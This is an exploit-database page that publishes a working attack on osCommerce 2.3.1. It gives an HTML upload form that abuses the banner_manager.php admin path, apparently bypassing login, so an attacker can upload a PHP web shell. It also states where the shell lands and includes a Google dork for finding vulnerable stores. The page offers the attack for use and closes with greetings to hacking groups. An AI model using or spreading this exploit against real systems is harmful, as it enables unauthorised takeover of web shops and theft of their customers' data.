[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

osCommerce 2.3.1 (banner_manager.php) Remote File Upload Vulnerability

Author
Number 7
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-16102
Category
web applications
Date add
14-05-2011
Platform
php
# Exploit Title: [OSC 2.3.1: Remote File Upload Vulnerability : Banner Manager]
# Google Dork: [powered by oscommerce]  (we will automatically add these to the GHDB)
# Date: [13-05-2011]
# Author: [Number 7]
# Software Link: [http://www.oscommerce.com/ext/oscommerce-2.3.1.zip]
# Version: [2.3.1]
# Tested on: [Linux-apache-win03-mac Os .... ]
# CVE : [if exists]
_______________________________________________________________________________________
 
<form name="new_banner" action="http://site/path/admin/banner_manager.php/login.php?action=insert" method="post" enctype="multipart/form-data"><br>
<input type="file" name="banners_image"><br>
<input name="submit" value=" Save " type="submit"></form>
 
you will find your shell in
 
http://site/path/images/yourshell.php
 
_______________________________________________________________________________________
Greetz: Ares-xGeek-allen-s man-SWAT-SPAM-TN // Tn-Hackers
Site:   Top-sec.com/vb // arhack.net/vb



#  0day.today [2024-09-28]  #